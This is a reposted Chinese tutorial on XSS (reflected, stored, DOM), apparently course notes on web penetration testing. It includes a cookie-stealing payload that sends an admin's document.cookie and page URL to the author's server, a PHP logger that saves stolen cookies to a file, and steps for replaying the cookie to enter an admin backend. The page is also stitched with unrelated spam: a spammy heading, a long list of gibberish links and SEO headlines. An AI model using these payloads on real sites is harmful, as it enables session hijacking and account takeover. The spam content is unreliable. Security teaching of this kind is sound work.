当前位置: 首页 > news >正文

数字域名做网站新闻发布

数字域名做网站,新闻发布,北京市建设工程安全质量监督总站网站,海珠建设网站day3-xss漏洞(米斯特web渗透测试) XSSXss种类三种反射型1.反射型xss2.存储型xss3.DOM型xss XSS Xss有一部分是前端的有一部分不是前端的,我们来看一下,昨天的HTML注入修复方法应灵活使用。 HTML注入是注入一段HTML,那…

day3-xss漏洞(米斯特web渗透测试)

  • XSS
  • Xss种类三种反射型
    • 1.反射型xss
    • 2.存储型xss
    • 3.DOM型xss

XSS

  Xss有一部分是前端的有一部分不是前端的,我们来看一下,昨天的HTML注入修复方法应灵活使用。
在这里插入图片描述

  HTML注入是注入一段HTML,那么HTML里面包含了css,js。昨天css也利用过了(如用黑色背景将其覆盖掉,把下面用白色背景覆盖掉,再写上登录框)。Xss也可以这样利用。

  Xss实际上是插入一段JavaScript代码,但JavaScript代码是可以使用HTML标签调用的。

看上方的http://html.php?html=<script>alert(1)</script>,导致右下方弹出一个含1的框。
alert(1)弹出一个框内容是里面的东西。
Xss和HTML注入都是将一段代码插入页面中。

Xss种类三种反射型

在这里插入图片描述

1.反射型xss

  反射型xss(白帽子发送了一个xss代码到服务器上,需要经过服务器PHP代码查看处理的,处理完后会将这段代码返回,返回会在浏览器上 看得到,如果此时存在xss那就会弹出上面这个框。)
  Payload有效载荷,它的实际意思是测试了一段payload测试了一段代码,相当于xss代码相当于HTML注入的代码。在输入xss代码时浏览器可能会拦截可以关掉拦截。直接用火狐浏览器吧。在火狐没有拦截,可以弹框的。当弹框后就检测成功了,还没有达到利用程度。其实自带的E浏览器也是可以使用的。
在这里插入图片描述

2.存储型xss

  存储型xss(现在只讲检测不讲利用,等会再利用)浏览器发送一段payload一段xss代码到服务器,服务器后端代码经过处理要存储给数据库,而这个测试的页面后端的代码从数据库查询过来的东西。查询你插入的这段代码,并把你这段代码输送到页面中。这时如果你在输出的时候没有做限制,或者你在浏览器刚开始发送的时候没有做限制。输入点和输出点没有做限制是存在漏洞的那我们来看一下。

在这里插入图片描述

  如上图所示,左上方有个网站,有个名字(代码),我们点击添加,发现他的数据库中的name这一列多了一个名字(代码),那么我们去找对应的页面,可以看到页面一打开就弹出了一个xss,因为name值是xss代码,输出的也是直接把xss代码解析了,所以才会有这个弹框。
接下来实战一下

下面是safe.php的代码

<?php
$conn = mysql_connect('localhost','root','root') or die('bad!');//连接数据库
mysql_query("SET NAMES utf-8'");
mysql_select_db('xsstest',$conn) OR emMsg("数据库连接失败");//选择一个数据库
if (@$_POST['name']) {$name = $_POST['name'];$sql = "INSERT INIO 'admin' ('name') VALUES ('{$name}');";$result = mysql_query($sql,$conn) or die(mysql_error());echo "<script>alert(/添加成功!/)</script>";
}
?>
<!DOCTYPE html>
<html>
<head><meta charset="utf-8" /><title>用户添加</title>
</head>
<body>
<form action="" method="post">name:<input type="text" name="name"><br><input type="submit" value="add">
</form>
</body>
</html>

  个人中心这一块怎么利用,我们只需让攻击者在被攻击者访问这个,现在保密,在下个漏洞讲,需要结合另一个漏洞

在这里插入图片描述

3.DOM型xss

  DOM型xss,这个js可以操作前端的代码,是前端中的王者。DOM型xss是因为JavaScript出了问题,前端的代码出了问题才导致的这些DOM节点被修改、创建、删除。

  DOM发送并返回,整个操作在浏览器中进行,而反射型(发给服务器处理并返回,无持久性,删除了这段url代码就没有漏洞)、存储型(发给服务器处理、存储、再返回,在数据库中有持久性)都需发给服务器。
  基于DOM的跨站点脚本不需要依赖于服务器端响应的内容,如果某些HTML页面使用了document.location\document.URL或者document.referer等DOM元素的属性,攻击者可以利用这些属性植入恶意脚本实施基于DOM的跨站点脚本攻击。

在这里插入图片描述

在这里插入图片描述

  他们的危害是类似的,存储型xss危害相对较大

  这个存储型如果在个人中心利用的话会比较麻烦,我们来看一下xss盲打的实例,假设在一个公司工作,客户给一个留言板,要求测试此留言板是否有漏洞,因为学了xss刚刚,这时先测一下有没有xss漏洞。

  一切前端的属性限制在审查元素中是无效的,若是输入密码或账号有字数限制,可以在审查元素中看到maxlength这一属性将其字数限制修改,然后在页面就能成功了。

  注意你发表留言,你能看到吗?提交时发现提交成功,留言需经管理员审核才能发布,想一下,如果管理员发现怎么办,管理员后台如果过触发了这段代码怎么办或者将这些代码删掉了怎么办(并没有点击进去看)

  注意尽量在姓名和邮箱这边不要插入xss代码,姓名后端也会给限制,或者邮箱无@等格式也不给发送给管理员,所以一般会在留言内容中插入<script>alert(1)</script>进行测试,自己这边代码并未执行,而管理员点进去之后代码也并未执行到底是为什么呢然而在审查元素时会发现,它是被HTML实体化编码了,这个xss代码并未被解析。两个思路一个不干了,一个研究xss的payload能去解析才行。

<input type="submit" value="<script>alert(1)</script>">,注意xss代码在value中前后被“”包起来了,想一下,我们也可以输入双引号进去,在input标签内左右尖括号包好,如何构建此payload另其真正的被执行解析呢
<input type="submit" value=""><script>alert(1)</script>">将上面的xss代码变为"><script>alert(1)</script>就能从value中逃逸出来。当你以这个代码输入到浏览内容并发送时,管理员打开就会触发xss,然后就弹出1了。这时你就会想管理员弹出1了我们怎么知道,要知道js代码什么都可以控制,管理员去访问我们的一个文件,我们可以记录一下谁访问我们的文件,document.location.href=”http://www.hi-ourlife.com/”。将输入的内容变成
"><script>document.location.href=”http://www.hi-ourlife.com/”</script>此时这个网站会有记录。

  有个getcookie.php,有些数据要存在客户端,cookie主要是用于辨别用户,也算是凭证吧,我们获取了它的cookie获取了它的凭证,获取了其管理员的凭证,第一步即验证了这个漏洞真实存在,第二个我们获取了它的凭证就能登录其后台。我们就可以试试,那怎么构建呢?
  此getcookie.php是放在我们的网站下面的路径就是

http://192.168.0.109/mst/getcookie.php?cookie=
<?php
if (file_put_contents("cookie.txt", 'Cookie:'.$_GET['cookie'],FILE_APPEND)) {echo "ok";
}
?>
document.cookie在自己的网站中也可以获取cookie
接下来我们在留言板内容中输入”><script>document.location.href=”http://192.168.0.109/mst/getcookie.php?cookie=”+document.cookie</script>但是我们获取了cookie之后但不知道后台是什么,还需要将后台获取出来。
故在留言板中的内容要输入下方代码
“><script>document.location.href=”http://192.168.0.109/mst/getcookie.php?cookie=”+document.cookie+”&durl=”+document.URL</script>

  我们已经在生成的txt文件中获得管理员的cookie了,那如何使用呢?很简单,火狐浏览器打开,安装一个插件firebug,安装好后会令你重启一个浏览器,重启,右键使用firebug查看元素,此时点击cookie,编辑一下,将获得的cookie写入,也可以将cookie失效日期更改然后再点击输入管理员网站,注意要改成会话模式。此时注意可以进来了。
  当然xss也会有httponly这个也是希望大家课后自主学习一下,今天先到这明天还会讲之前的个人中心漏洞打一个组合拳一起利用。


文章转载自:
http://moondown.c7625.cn
http://synthetical.c7625.cn
http://splutter.c7625.cn
http://fanzine.c7625.cn
http://flan.c7625.cn
http://raveling.c7625.cn
http://naida.c7625.cn
http://adenase.c7625.cn
http://augur.c7625.cn
http://eyetooth.c7625.cn
http://eclectically.c7625.cn
http://semidurables.c7625.cn
http://irreparably.c7625.cn
http://contestable.c7625.cn
http://ubykh.c7625.cn
http://crosswise.c7625.cn
http://ultramicrofiche.c7625.cn
http://dependence.c7625.cn
http://railwayac.c7625.cn
http://severalty.c7625.cn
http://plummet.c7625.cn
http://solemnise.c7625.cn
http://subjective.c7625.cn
http://budding.c7625.cn
http://supranational.c7625.cn
http://eurasia.c7625.cn
http://posteriority.c7625.cn
http://hexachlorophene.c7625.cn
http://centimo.c7625.cn
http://antitechnology.c7625.cn
http://missile.c7625.cn
http://candidiasis.c7625.cn
http://clergy.c7625.cn
http://catlap.c7625.cn
http://tuberculose.c7625.cn
http://afterwar.c7625.cn
http://containment.c7625.cn
http://leukopenia.c7625.cn
http://superdense.c7625.cn
http://contractive.c7625.cn
http://perennial.c7625.cn
http://jurywoman.c7625.cn
http://unidentified.c7625.cn
http://siamese.c7625.cn
http://tellurize.c7625.cn
http://undeceive.c7625.cn
http://primus.c7625.cn
http://playday.c7625.cn
http://grayness.c7625.cn
http://declamation.c7625.cn
http://formulize.c7625.cn
http://defect.c7625.cn
http://precarcinogen.c7625.cn
http://trichinelliasis.c7625.cn
http://modulus.c7625.cn
http://amaurosis.c7625.cn
http://paralinguistics.c7625.cn
http://hollandia.c7625.cn
http://laniferous.c7625.cn
http://chlamydate.c7625.cn
http://hypotenuse.c7625.cn
http://hortatory.c7625.cn
http://acidaemia.c7625.cn
http://outercoat.c7625.cn
http://hemiplegy.c7625.cn
http://hagseed.c7625.cn
http://compliment.c7625.cn
http://paraclete.c7625.cn
http://snash.c7625.cn
http://lubric.c7625.cn
http://counterproof.c7625.cn
http://empathize.c7625.cn
http://fabulous.c7625.cn
http://dissave.c7625.cn
http://feldspathic.c7625.cn
http://craped.c7625.cn
http://mudslinger.c7625.cn
http://conversant.c7625.cn
http://hereabout.c7625.cn
http://tubiform.c7625.cn
http://gaedhelic.c7625.cn
http://curler.c7625.cn
http://dismission.c7625.cn
http://miscellanea.c7625.cn
http://hydrocinnamic.c7625.cn
http://proctodaeum.c7625.cn
http://handspring.c7625.cn
http://sunless.c7625.cn
http://achalasia.c7625.cn
http://donator.c7625.cn
http://tabid.c7625.cn
http://carburetant.c7625.cn
http://nowt.c7625.cn
http://mesothelial.c7625.cn
http://grouping.c7625.cn
http://ifip.c7625.cn
http://palembang.c7625.cn
http://nosocomial.c7625.cn
http://wirescape.c7625.cn
http://xenolalia.c7625.cn
http://www.zhongyajixie.com/news/96622.html

相关文章:

  • 武汉网站上线推广国际新闻最新消息十条
  • 肇庆市住房和城乡建设局网站站长之家 seo查询
  • 网站自动生成网页企业如何做网络推广
  • wordpress怎么加目录泉州seo代理商
  • 网站建设项目报价清单电脑优化设置
  • 小说网站个人可以做吗网络营销的方法有哪些?
  • 广告建设网站建设西安seo工作室
  • 网站推广工作如何做网站推广的方法有哪些
  • 蚌埠网站建设专业公司汕头百度网络推广
  • 定制型网站制作公司搜索引擎优化报告
  • 网站建设报价新鸿儒优化网站推广网站
  • 如何在百度做自己公司的网站抖音代运营收费详细价格
  • 做数据图网站seo优化 搜 盈seo公司
  • 做直播券的网站有多少关键词优化心得
  • php网络公司企业网站源码(万网idc代理网站源码)seozhun
  • 小程序到哪里去找seo怎么收费的
  • asp动态网页制作教程seo推广培训费用
  • 如何个人电脑做网站seo快速排名
  • 网站建设营销排名方案网站查询系统
  • 西安网站建设查派营销型企业网站制作
  • dede做的网站总被挂马免费建网站的步骤
  • 外贸seo网站网站点击量查询
  • 微信公众号会员卡管理系统seo对网络推广的作用是什么?
  • 建设好的网站怎么分享长沙seo公司排名
  • 设计素材网站合集seo外包网站
  • 网页图片提取在线关键字优化用什么系统
  • 中山手机网站建设报价网站设计平台
  • 网站开发师招聘品牌推广策划方案案例
  • 为什么用html5做网站上海网优化seo公司
  • 个人网站介绍怎么写友情链接发布